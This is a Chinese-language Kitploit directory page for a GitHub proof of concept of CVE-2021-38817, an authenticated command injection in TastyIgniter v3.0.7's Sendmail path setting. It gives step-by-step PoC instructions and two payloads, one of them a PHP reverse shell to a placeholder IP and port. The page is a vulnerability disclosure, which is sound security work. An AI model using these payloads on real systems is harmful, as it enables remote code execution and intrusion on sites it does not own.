Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-38817-Remote-OS-Command-Injection — TastyIgniter v3.0.7 中 Sendmail 路径字段的远程操作系统命令注入漏洞 | Kitploit
工具/GitHubGitHub/huskyhacks/cve-2021-38817-remote-os-command-injection
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制Payload 开发
GitHubhuskyhacks/cve-2021-38817-remote-os-command-injection

CVE-2021-38817-Remote-OS-Command-Injection

TastyIgniter v3.0.7 中 Sendmail 路径字段的远程操作系统命令注入漏洞

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
92413年前尚未审核
分享

CVE-2021-38817-远程操作系统命令注入

TastyIgniter v3.0.7 Sendmail 网页部分中存在经过身份验证的远程操作系统命令注入/远程代码执行漏洞 (CVE-2021-38817)

TastyIgniter v3.0.7 餐厅CMS的 Sendmail 配置菜单中存在经过身份验证的远程操作系统命令注入漏洞。Sendmail 路径参数未正确清理,如字段中预填的 /usr/sbin/sendmail -bs 命令所示,通过添加分号和额外的操作系统命令可注入任意命令。

受影响组件

URL: /admin/settings/edit/mail

字段:

  • 邮件协议: Sendmail
  • 字段: Sendmail 路径

POC

  • 使用凭据登录 /admin 门户。
  • 访问 /admin/settings/edit/mail
  • 在 邮件协议 下拉菜单中选择 Sendmail
  • 在新的 SendMail 路径 字段中,添加分号和任意操作系统命令,例如 /usr/sbin/sendmail -bs; sleep 10
  • 载荷

    • /usr/sbin/sendmail -bs; sleep 10
    • /usr/sbin/sendmail -bs; php -r '$sock=fsockopen("[IP]",[PORT]);exec("/bin/sh -i <&3 >&3 2>&3");'

    TastyIgniterCVE

    发现者

    Matt Kiely (HuskyHacks) 和 Mike Padrick (Fearless),2021年8月

    CVE 于 2022年10月分配(笑死)

    下载工具